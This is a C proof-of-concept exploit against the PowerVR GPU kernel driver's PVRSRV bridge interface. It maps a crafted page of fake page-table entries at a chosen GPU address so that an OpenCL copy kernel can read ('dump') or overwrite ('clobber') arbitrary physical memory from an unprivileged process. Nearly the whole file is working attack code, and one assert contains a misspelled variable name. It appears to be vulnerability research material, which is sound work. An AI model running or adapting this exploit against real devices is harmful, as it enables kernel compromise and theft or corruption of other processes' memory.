#define ioctl ioctl_BARF

#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <stdbool.h>
#include <setjmp.h>
#include <byteswap.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <inttypes.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define CL_TARGET_OPENCL_VERSION 300
#include <CL/opencl.h>

#undef ioctl

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define CLPCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == NULL) \
    errx(1, "CL_PTR_CHECK(" #x ")"); \
  __res;                      \
})

#define CLVCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res != CL_SUCCESS) \
    errx(1, "CL_VAL_CHECK(" #x "): %d", __res); \
  __res;                      \
})


static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count;) {
    unsigned char *orig_bytes = ((unsigned char*)_data) + byte_offset;
    unsigned char bytes[16];
    memcpy(bytes, orig_bytes, 16);
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
    byte_offset += 16;
  }
}

typedef void *IMG_HANDLE;

#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440
struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
const char *bridge_name(uint32_t id) {
  if (id == 0) return "PVRSRV_BRIDGE_DEFAULT";
  if (id == 1) return "PVRSRV_BRIDGE_SRVCORE";
  if (id == 2) return "PVRSRV_BRIDGE_SYNC";
  if (id == 3) return "PVRSRV_BRIDGE_RESERVED1";
  if (id == 4) return "PVRSRV_BRIDGE_RESERVED2";
  if (id == 5) return "PVRSRV_BRIDGE_PDUMPCTRL";
  if (id == 6) return "PVRSRV_BRIDGE_MM";
  if (id == 7) return "PVRSRV_BRIDGE_MMPLAT";
  if (id == 13) return "PVRSRV_BRIDGE_CACHE";
  if (id == 128) return "PVRSRV_BRIDGE_RGXTQ";
  if (id == 129) return "PVRSRV_BRIDGE_RGXCMP";
  if (id == 130) return "PVRSRV_BRIDGE_RGXTA3D";
  return "PVRSRV_BRIDGE_<?>";
}

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	uint64_t uiChunkSize;
	uint64_t uiSize;
	uint32_t *pui32MappingTable;
	const char *puiAnnotation;
	uint32_t ui32AnnotationLength;
	uint32_t ui32Log2PageSize;
	uint32_t ui32NumPhysChunks;
	uint32_t ui32NumVirtChunks;
	uint32_t ui32PDumpFlags;
	uint32_t ui32PID;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	IMG_HANDLE hPMRPtr;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

typedef struct PVRSRV_BRIDGE_IN_RGXCREATETRANSFERCONTEXT_TAG
{
	void *hPrivData;
	char *pui8FrameworkCmd;
	uint32_t ui32ContextFlags;
	uint32_t ui32FrameworkCmdize;
	uint32_t ui32PackedCCBSizeU8888;
	uint32_t ui32Priority;
} __packed PVRSRV_BRIDGE_IN_RGXCREATETRANSFERCONTEXT;

#define IMG_UINT32 uint32_t
#define IMG_UINT64 uint64_t
#define IMG_CHAR char
#define IMG_BYTE uint8_t
#define IMG_UINT8 uint8_t
#define IMG_HANDLE void*
typedef int32_t PVRSRV_FENCE;
typedef int32_t PVRSRV_TIMELINE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;

#define PVRSRV_BRIDGE_MM 6
#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE 21
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE_TAG
{
	uint64_t sAddress;
	uint64_t uiLength;
	IMG_HANDLE hDevmemServerHeap;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE_TAG
{
	IMG_HANDLE hReservation;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE;

typedef struct PVRSRV_BRIDGE_IN_RGXKICKCDM2_TAG
{
	IMG_UINT64 ui64DeadlineInus;
	IMG_HANDLE hComputeContext;
	IMG_UINT32 *pui32ClientUpdateOffset;
	IMG_UINT32 *pui32ClientUpdateValue;
	IMG_UINT32 *pui32SyncPMRFlags;
	IMG_BYTE *pui8DMCmd;
	IMG_CHAR *puiUpdateFenceName;
	IMG_HANDLE *phClientUpdateUFOSyncPrimBlock;
	IMG_HANDLE *phSyncPMRs;
	PVRSRV_FENCE hCheckFenceFd;
	PVRSRV_TIMELINE hUpdateTimeline;
	IMG_UINT32 ui32ClientCacheOpSeqNum;
	IMG_UINT32 ui32ClientUpdateCount;
	IMG_UINT32 ui32CmdSize;
	IMG_UINT32 ui32ExtJobRef;
	IMG_UINT32 ui32NumOfWorkgroups;
	IMG_UINT32 ui32NumOfWorkitems;
	IMG_UINT32 ui32PDumpFlags;
	IMG_UINT32 ui32SyncPMRCount;
} __packed PVRSRV_BRIDGE_IN_RGXKICKCDM2;
typedef struct PVRSRV_BRIDGE_OUT_RGXKICKCDM2_TAG
{
	PVRSRV_ERROR eError;
	PVRSRV_FENCE hUpdateFence;
} __packed PVRSRV_BRIDGE_OUT_RGXKICKCDM2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
	IMG_DEV_VIRTADDR sHeapBaseAddr;
	IMG_DEVMEM_SIZE_T uiHeapLength;
	IMG_HANDLE hDevmemCtx;
	IMG_UINT32 ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
	IMG_HANDLE hDevmemHeapPtr;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPAGES 24
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPAGES_TAG
{
	uint64_t sDevVAddr;
	IMG_HANDLE hPMR;
	IMG_HANDLE hReservation;
	uint32_t ui32PageCount;
	uint32_t ui32PhysicalPgOffset;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPAGES;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPAGES_TAG
{
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPAGES;

int collect_buf_addr = 0;
uint64_t collected_buf_addr;
IMG_HANDLE collected_heap;
int ioctl_fd = -1;
int ioctl(int fd, unsigned int cmd, unsigned long arg) {
  int errno_ = errno;

  if (cmd == 0xc0206440) {
    ioctl_fd = fd;
    struct drm_pvr_srvkm_cmd *cmd = (void*)arg;
    printf("cmd(fd=%d, bridge_id=%s(%u), bridge_func_id=0x%x, in_data_ptr=0x%llx, out_data_ptr=0x%llx, in_data_size=0x%x, out_data_size=0x%x)\n",
           fd, bridge_name(cmd->bridge_id), cmd->bridge_id, cmd->bridge_func_id, cmd->in_data_ptr, cmd->out_data_ptr, cmd->in_data_size, cmd->out_data_size);
    if (cmd->bridge_id == 6/*MM*/) {
      if (cmd->bridge_func_id == 9 || cmd->bridge_func_id == 10) {
        printf("  PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKED(LOCKED?)PMR\n");
        PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR *inp = (void*)(unsigned long)cmd->in_data_ptr;
        printf("  cs=0x%llx s=0x%llx tab=%p ann=%p ann_len=%u log2(ps)=%u\n",
               inp->uiChunkSize, inp->uiSize, inp->pui32MappingTable, inp->puiAnnotation,
               inp->ui32AnnotationLength, inp->ui32Log2PageSize);
        printf("  pchunks=%u vchunks=%u pdflags=0x%x pid=%u flags=0x%llx\n",
               inp->ui32NumPhysChunks, inp->ui32NumVirtChunks, inp->ui32PDumpFlags,
               inp->ui32PID, inp->uiFlags);
      }
      if (cmd->bridge_func_id == 21) {
        PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE *inp = (void*)(unsigned long)cmd->in_data_ptr;
        printf("  PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE(sAddress=0x%llx, uiLength=0x%llx, heap=%p)\n",
               inp->sAddress, inp->uiLength, inp->hDevmemServerHeap);
        unsigned int start_pc_idx = (inp->sAddress) >> (12 + 9 + 9);
        unsigned int end_pc_idx = (inp->sAddress + inp->uiLength - 1) >> (12 + 9 + 9);
        printf("  #####  PC range %u-%u  #####\n", start_pc_idx, end_pc_idx);
        if (collect_buf_addr) {
          assert(collected_buf_addr == 0);
          collected_buf_addr = inp->sAddress;
          collected_heap = inp->hDevmemServerHeap;
        }
      }
      if (cmd->bridge_func_id == 22) {
        printf("  PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE\n");
      }
      if (cmd->bridge_func_id == 19) {
        printf("  PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR\n");
      }
      if (cmd->bridge_func_id == PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE) {
        PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE *inp = (void*)(unsigned long)cmd->in_data_ptr;
        printf("  PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE(base=0x%llx, length=0x%llx, devmem=%p, page_order=%u)\n",
               inp->sHeapBaseAddr, inp->uiHeapLength, inp->hDevmemCtx, inp->ui32Log2DataPageSize);
      }
    }
    if (cmd->bridge_id == 129/*Rogue Compute*/) {
      if (cmd->bridge_func_id == 5) {
        printf("  PVR_SRV_BRIDGE_RGXCMP_RGXKICKCDM2\n");
        PVRSRV_BRIDGE_IN_RGXKICKCDM2 *inp = (void*)(unsigned long)cmd->in_data_ptr;
        assert(sizeof(*inp) == cmd->in_data_size);
        hexdump(inp, cmd->in_data_size);
        printf("  ui64DeadlineInus=%llu\n", inp->ui64DeadlineInus);
        printf("  hComputeContext=%p\n", inp->hComputeContext);
        printf("  pui8DMCmd[ui32CmdSize]\n");
        hexdump(inp->pui8DMCmd, inp->ui32CmdSize);
      }
    }
  }

  errno = errno_;
  int res = syscall(__NR_ioctl, fd, cmd, arg);
  return res;
}

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(ioctl_fd, DRM_IOCTL_PVR_SRVKM_CMD, (unsigned long)&cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE in = {
    .sAddress = base, .uiLength = len, .hDevmemServerHeap = heap
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE);
  return out.hReservation;
}

// non-sparse, locked
static IMG_HANDLE alloc_pmr(uint64_t alloc_size, int page_size, uint64_t cpu_cache_mode, uint64_t gpu_cache_mode) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = page_size,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean (why is this even a question)*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc WTF why even ask XXX*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

static void map_pmr_pages(unsigned long vaddr, IMG_HANDLE pmr, IMG_HANDLE resv, uint32_t pages, uint64_t cpu_cache_mode, uint64_t gpu_cache_mode) {
  uint64_t heap_idx = 1; // cpu-local
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPAGES in = {
    .sDevVAddr = vaddr,
    .hPMR = pmr,
    .hReservation = resv,
    .ui32PageCount = pages,
    .ui32PhysicalPgOffset = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean (why is this even a question)*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc WTF why even ask XXX*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPAGES out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPAGES);
}

void notify_cb(const char *errinfo, const void *private_info, size_t cb, void *user_data) {
  printf("notify called: '%s'\n", errinfo);
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);

  if (argc != 2 || (strcmp(argv[1], "dump") && strcmp(argv[1], "clobber"))) {
    printf("usage: %s <dump|clobber>\n", argv[0]);
    return 1;
  }
  int clobber_mode = strcmp(argv[1], "clobber") == 0;

  cl_device_id dev_id = NULL;
  cl_int cl_err;
  {
    cl_uint num_platforms, num_platforms_2;
    if (clGetPlatformIDs(0, NULL, &num_platforms) != CL_SUCCESS)
      errx(1, "GPIDs");
    printf("have %u platforms\n", num_platforms);
    cl_platform_id platforms[num_platforms];
    if (clGetPlatformIDs(num_platforms, platforms, &num_platforms_2))
      errx(1, "GPIDs 2");
    if (num_platforms != num_platforms_2)
      errx(1, "nps mismatch");
    for (int idx=0; idx<num_platforms; idx++) {
      char platform_name[200];
      size_t platform_name_size;
      if (clGetPlatformInfo(platforms[idx], CL_PLATFORM_NAME, sizeof(platform_name)-1, platform_name, &platform_name_size) != CL_SUCCESS)
        errx(1, "GPI name");
      platform_name[platform_name_size] = '\0';
      printf("platforms[%d]: '%s'\n", idx, platform_name);
    }
    assert(num_platforms == 1);

    cl_uint num_devs;
    cl_err = clGetDeviceIDs(platforms[0], CL_DEVICE_TYPE_GPU, 1, &dev_id, &num_devs);
    if (cl_err != CL_SUCCESS)
      errx(1, "GDID: %d", cl_err);
    assert(num_devs == 1);
    printf("device ID: %p\n", dev_id);
  }

  cl_context ctx = clCreateContext(NULL, 1, &dev_id, notify_cb, NULL, &cl_err);
  if (ctx == NULL)
    errx(1, "cCC: %d", cl_err);
  printf("context created\n");

  cl_command_queue cq = clCreateCommandQueue(ctx, dev_id, 0, &cl_err);
  if (cq == NULL)
    errx(1, "CCQ: %d", cl_err);

  static const char *const proc_source =
      "__kernel void copy(__global int* input, __global int* output, const unsigned int count, const unsigned int input_start_idx, const unsigned int output_start_idx) {\n"
      "  size_t gid = get_global_id(0);\n"
      "  if (gid < count)\n"
      "    output[output_start_idx+gid] = input[input_start_idx+gid];\n"
      "}\n";
  cl_program prog = clCreateProgramWithSource(ctx, 1, &proc_source, NULL, &cl_err);
  if (prog == NULL)
    errx(1, "CPWS: %d", cl_err);
  cl_err = clBuildProgram(prog, 1, &dev_id, NULL, NULL, NULL);
  if (cl_err != CL_SUCCESS) {
    printf("build program: %d\n", cl_err);
    char build_log[0x2000];
    size_t build_log_size;
    if (clGetProgramBuildInfo(prog, dev_id, CL_PROGRAM_BUILD_LOG, sizeof(build_log)-1, &build_log, &build_log_size) != CL_SUCCESS)
      errx(1, "GPBI");
    build_log[build_log_size] = '\0';
    printf("=============================\n%s\n===========================\n", build_log);
    exit(1);
  }
  printf("built program\n");
  cl_kernel kern = clCreateKernel(prog, "copy", &cl_err);
  if (kern == NULL)
    errx(1, "CK: %d", cl_err);

  printf("\nCREATING LEGIT BUF\n");
  cl_mem legit_buf = CLPCHK(clCreateBuffer(ctx, CL_MEM_READ_WRITE, 0x200000, NULL, &cl_err));
  printf("\nCREATING CLOBBERME BUF\n");
  collect_buf_addr = 1;
  // unknown header (or footer???): 8 bytes
  cl_mem clobberme_buf = CLPCHK(clCreateBuffer(ctx, CL_MEM_READ_WRITE, 0x400000+0xff8, NULL, &cl_err));

  collect_buf_addr = 0;
  uint64_t clobberme_buf_addr = collected_buf_addr;
  uint64_t clobberme_aligned_area = (clobberme_buf_addr + 8 + (0x200000-1)) & ~(uint64_t)(0x200000-1);
  uint64_t clobberme_align_offset = clobberme_aligned_area - clobberme_buf_addr;
  uint64_t clobberme_pc_idx = clobberme_aligned_area >> (12+9+9);
  uint64_t clobberme_pd_idx = (clobberme_aligned_area >> (12+9)) & 0x1ff;
  assert(cloberme_buf_addr != 0);
  collected_buf_addr = 0;
  printf("BUFFERS CREATED; clobberme at 0x%llx, aligned area at 0x%llx (PC idx %llu, PD idx %llu)\n\n",
         clobberme_buf_addr, clobberme_aligned_area, clobberme_pc_idx, clobberme_pd_idx);
  assert(clobberme_pc_idx);

  // let's fill the output buffer with an error filler, so in dump mode we can
  // tell if the later copy into it fails.
  // this is also the data we clobber with in clobber mode.
  char *error_pad = malloc(0x200000);
  memset(error_pad, 'E',   0x200000);
  CLVCHK(clEnqueueWriteBuffer(cq, legit_buf, CL_TRUE, 0, 0x200000, error_pad, 0, NULL, NULL));

  IMG_HANDLE dummy_resv = create_reservation(collected_heap, 0, 0x1000);
  printf("dummy_resv = %p\n", dummy_resv);
  uint64_t bogo_vaddr = (3ULL << (12+9+9)) | (clobberme_pc_idx << (12+9)) | (clobberme_pd_idx << 12);
  printf("bogo_vaddr = 0x%llx\n", bogo_vaddr);
  IMG_HANDLE page_table_pmr = alloc_pmr(0x1000, 12, 0/*CPU WC*/, 3/*GPU incoherent*/);
  uint64_t *page_table_usermap = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ioctl_fd, (unsigned long)page_table_pmr << 12));
  for (int i=0; i<512; i++) {
    // create fake PTEs that map 4K pages all over memory for us
    page_table_usermap[i] = 1 | (0x1000ULL * i * 512);
  }
  printf("page_table_usermap = %p\n", page_table_usermap);
  // ############### THIS IS WHERE THE CORRUPTION HAPPENS #################
  map_pmr_pages(bogo_vaddr, page_table_pmr, dummy_resv, 1, 0/*CPU WC*/, 3/*GPU incoherent*/);
  printf("BOGO MAPPING DONE\n\n");

  unsigned int copy_count = 0x200000/4;
  if (clobber_mode) {
    // clobber copies from legit buf into controlled mapping
    CLVCHK(clSetKernelArg(kern, 0/*input*/, sizeof(cl_mem), &legit_buf));
    CLVCHK(clSetKernelArg(kern, 1/*output*/, sizeof(cl_mem), &clobberme_buf));
    CLVCHK(clSetKernelArg(kern, 2/*count*/, sizeof(unsigned int), &copy_count));
    unsigned int input_start_idx = 0;
    CLVCHK(clSetKernelArg(kern, 3/*input_start_idx*/, sizeof(unsigned int), &input_start_idx));
    unsigned int output_start_idx = (clobberme_align_offset)/4;
    CLVCHK(clSetKernelArg(kern, 4/*output_start_idx*/, sizeof(unsigned int), &output_start_idx));
  } else {
    // dump mode copies from controlled mapping into legit buf
    CLVCHK(clSetKernelArg(kern, 0/*input*/, sizeof(cl_mem), &clobberme_buf));
    CLVCHK(clSetKernelArg(kern, 1/*output*/, sizeof(cl_mem), &legit_buf));
    CLVCHK(clSetKernelArg(kern, 2/*count*/, sizeof(unsigned int), &copy_count));
    unsigned int input_start_idx = (clobberme_align_offset)/4;
    CLVCHK(clSetKernelArg(kern, 3/*input_start_idx*/, sizeof(unsigned int), &input_start_idx));
    unsigned int output_start_idx = 0;
    CLVCHK(clSetKernelArg(kern, 4/*output_start_idx*/, sizeof(unsigned int), &output_start_idx));
  }

  // actually do the copy
  size_t global_work_size = copy_count;
  size_t local_work_size = 1; // sorry if this makes you cringe
  cl_event work_ev;
  printf("BEGIN ENQUEUE\n");
  CLVCHK(clEnqueueNDRangeKernel(cq, kern, 1, NULL, &global_work_size, &local_work_size, 0, NULL, &work_ev));
  printf("ENQUEUED KERNEL\n");
  CLVCHK(clWaitForEvents(1, &work_ev));
  printf("KERNEL DONE\n");

  if (!clobber_mode) {
    char *copied_back = calloc(0x200000, 1);
    CLVCHK(clEnqueueReadBuffer(cq, legit_buf, CL_TRUE, 0, 0x200000, copied_back, 0, NULL, NULL));
    hexdump(copied_back, 0x200000);
  }

  _exit(0); // don't wait for whatever thing in CL is making exit() take seconds
}
